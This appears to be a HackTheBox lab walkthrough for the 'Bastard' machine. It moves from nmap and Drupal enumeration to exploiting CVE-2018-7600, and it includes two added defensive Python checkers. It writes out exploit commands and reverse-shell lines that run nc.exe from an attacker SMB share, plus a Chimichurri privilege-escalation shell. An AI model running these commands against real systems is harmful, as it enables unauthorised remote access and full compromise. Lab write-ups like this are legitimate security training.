Today we are going to solve another HackTheBox retired machine called “Bastard”. This lab was designed by . So let's jump into the machine.
Level : Easy
- Networking Scanning
- Manual Enumeration of CMS
- Drupal Exploit
- Privilege Escalation
- Kernel Exploit
IP address : 10.129.145.159
We start our journey by running an nmap scan with default scripts and version detection, which gives us information about the open ports and the services running on the target system.
nmap -sC -sV -p- 10.129.145.159
Nmap shows a few services running on the target: on port 80 an HTTP service is running, and at the same time we can see that Drupal 7 is running on it. Some other ports are open as well, like 135 and 49154.
Nmap scan report for 10.129.145.159
Host is up (0.17s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
From the results we choose to go with port 80, the Drupal CMS, so we start enumerating it. After some googling we learn that visiting the CHANGELOG page can give us some information.
Here we get the actual version information: Drupal 7.54, which from past experience is directly exploitable.
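The point above is worth turning into a repeatable check for anyone responsible for a Drupal site: the exposed CHANGELOG.txt hands out the exact release, and the release alone decides whether SA-CORE-2018-002 (CVE-2018-7600) applies. The Python below is an added example, not code from the writeup or from the exploit repository. It parses a constructed CHANGELOG.txt excerpt (same layout as the real file, newest release on the first line) and compares the version against 7.58, the 7.x release that shipped the fix; only the 7.x line is assessed, anything else is reported as unknown.

```python
import re
from typing import Optional, Tuple

# Constructed excerpt in the layout of a Drupal 7 CHANGELOG.txt.
# The newest release is always the first line, which is what the
# enumeration step in the writeup relies on.
CHANGELOG_SAMPLE = """Drupal 7.54, 2017-02-01
-----------------------
- (release notes omitted in this constructed sample)

Drupal 7.53, 2016-12-07
-----------------------
- (release notes omitted in this constructed sample)
"""

VERSION_RE = re.compile(r"^Drupal (\d+(?:\.\d+)+),", re.MULTILINE)

# Drupal 7.58 is the 7.x release that fixed SA-CORE-2018-002 (CVE-2018-7600).
FIXED_7 = (7, 58)


def drupal_version_from_changelog(text: str) -> Optional[Tuple[int, ...]]:
    """Return the newest release listed in CHANGELOG.txt as an int tuple."""
    m = VERSION_RE.search(text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def assess_cve_2018_7600(version: Optional[Tuple[int, ...]]) -> str:
    """'affected', 'patched', or 'unknown' for a parsed Drupal version."""
    if version is None or version[0] != 7:
        return "unknown"  # only the 7.x line is assessed here
    return "patched" if version >= FIXED_7 else "affected"


def audit(changelog_text: str) -> dict:
    """Summarise what a publicly readable CHANGELOG.txt discloses."""
    version = drupal_version_from_changelog(changelog_text)
    return {
        "version": version,
        "changelog_exposed": version is not None,
        "cve_2018_7600": assess_cve_2018_7600(version),
    }


if __name__ == "__main__":
    print(audit(CHANGELOG_SAMPLE))
```

Two remediation points follow from the audit result: upgrade to 7.58 or later, and stop serving CHANGELOG.txt and the other informational files that robots.txt lists (on IIS, a request-filtering rule in web.config; on Apache, the equivalent deny rule), since a robots.txt disallow hides nothing from a scanner.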
After searching on the internet I found an exploit. We could also use Metasploit, but we want to learn manual exploitation, so we skip Metasploit. The exploit is available on GitHub.
This particular version of Drupal has a remote code execution vulnerability. We get the user information back from the exploit, so we can confirm that the exploit is working fine. Now all we have to figure out is how to get a reverse shell.
https://github.com/pimps/CVE-2018-7600
cd CVE-2018-7600
python drupa7-CVE-2018-7600.py http://10.129.145.159 -c whoami
For the reverse shell we use the netcat binary, serve it from a temporary SMB server using impacket, and then use the remote code execution vulnerability to make a reverse connection to our Kali machine. A pre-compiled netcat binary is already available on Kali Linux under /usr/share/windows-binaries.
cp /usr/share/windows-binaries/nc.exe ./
sudo smbserver.py share .
Once everything is set up, it is time to exploit the vulnerability and get an initial foothold on the target machine.
python drupa7-CVE-2018-7600.py http://10.129.145.159 -c "\\\10.10.14.79\share\nc.exe -e cmd.exe 10.10.14.79 1234"
rlwrap nc -lnvp 1234
We got a reverse shell over netcat on port 1234.
Since we have an initial foothold on the target, it is time to elevate our privileges to an administrative account. We check the system information with the Windows command “systeminfo”, and here we learn that the system may be vulnerable to a kernel exploit, as no patches are installed and the machine is Windows Server 2008 R2. For that we can use different tools like Windows Exploit Suggester, wesng and many more.
systeminfo
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          15/5/2021, 11:15:16 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.573 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.599 MB
Virtual Memory: In Use:    496 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.145.159
                                 [02]: fe80::6ccc:55b:423f:1148
                                 [03]: dead:beef::6ccc:55b:423f:1148
To run Windows Exploit Suggester we have to set up a virtual environment and then install some dependencies; to create the virtual environment we used the virtualenv program.
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
pip install virtualenv
virtualenv -p python2 venv
source venv/bin/activate
pip install xlrd==1.2.0
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2021-05-15-mssb.xls --systeminfo ../systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
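What Windows Exploit Suggester does with the two inputs above is mechanical: read the installed hotfixes out of systeminfo, read the KB number from each bulletin line, and report every bulletin whose KB is absent. The Python below is an added example, not the writeup's or the tool's own code, that reproduces that comparison so a defender can run a patch-gap check against a saved systeminfo dump. It uses a constructed unpatched excerpt (the "Hotfix(s): N/A" case from this box) and a constructed patched excerpt with two KBs installed, plus three bulletin lines copied from the output above. Superseding updates are not modelled, so a "missing" result from this script is a prompt to verify, not a verdict.

```python
import re
from typing import Dict, List, Tuple

# Constructed systeminfo excerpts in the layout of the real command output.
SYSTEMINFO_UNPATCHED = """Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
"""

SYSTEMINFO_PATCHED = """Host Name:                 CONSTRUCTED-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
"""

# Three bulletin lines in the format Windows Exploit Suggester prints.
BULLETINS = """[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
"""

BULLETIN_RE = re.compile(
    r"^(?:\[\*\]\s*)?\[(?P<src>[EM])\] (?P<id>MS\d{2}-\d{3}): (?P<title>.*) \((?P<kb>\d+)\)"
)
KB_RE = re.compile(r"\bKB(\d+)\b")
FIELD_RE = re.compile(r"^([^:]+?):\s*(.*)$")


def parse_systeminfo(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Split systeminfo output into key/value fields and a list of KB numbers."""
    fields: Dict[str, str] = {}
    hotfixes: List[str] = []
    for line in text.splitlines():
        kb = KB_RE.search(line)
        if kb and line.lstrip().startswith("["):   # "[01]: KB982799" style rows
            hotfixes.append(kb.group(1))
            continue
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields, hotfixes


def parse_bulletins(text: str) -> List[dict]:
    """Extract bulletin id, KB and exploit-source marker from suggester output."""
    out = []
    for line in text.splitlines():
        m = BULLETIN_RE.match(line)
        if m:
            out.append({"id": m.group("id"), "kb": m.group("kb"),
                        "source": m.group("src"), "title": m.group("title")})
    return out


def missing_bulletins(systeminfo_text: str, bulletin_text: str) -> List[dict]:
    """Bulletins whose KB does not appear in the host's installed hotfix list."""
    _, hotfixes = parse_systeminfo(systeminfo_text)
    installed = set(hotfixes)
    return [b for b in parse_bulletins(bulletin_text) if b["kb"] not in installed]


if __name__ == "__main__":
    for label, dump in (("unpatched", SYSTEMINFO_UNPATCHED), ("patched", SYSTEMINFO_PATCHED)):
        ids = [b["id"] for b in missing_bulletins(dump, BULLETINS)]
        print(f"{label}: missing {ids}")
```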
After some time trying different kernel exploits, we decide to try the “Chimichurri” program, which you can download from GitHub. We transfer this binary to the victim machine using the temporary SMB server.
cp ~/Downloads/Chimichurri.exe ./
sudo smbserver.py share .
While trying to write files to the target system we found we did not have write permission, so we moved to a location that is writable by default, like the Temp or Tasks directory.
cd "C:\windows\tasks"
copy \\10.10.14.79\share\Chimichurri.exe
After successfully transferring the binary, it is time to create the reverse shell.
Chimichurri.exe 10.10.14.79 4444
Finally we got an elevated shell, and now it is time to collect the gems, the flags.
rlwrap nc -lvnp 4444
type "C:\Users\Administrator\Desktop\root.txt.txt"
type "C:\Users\dimitris\Desktop\user.txt"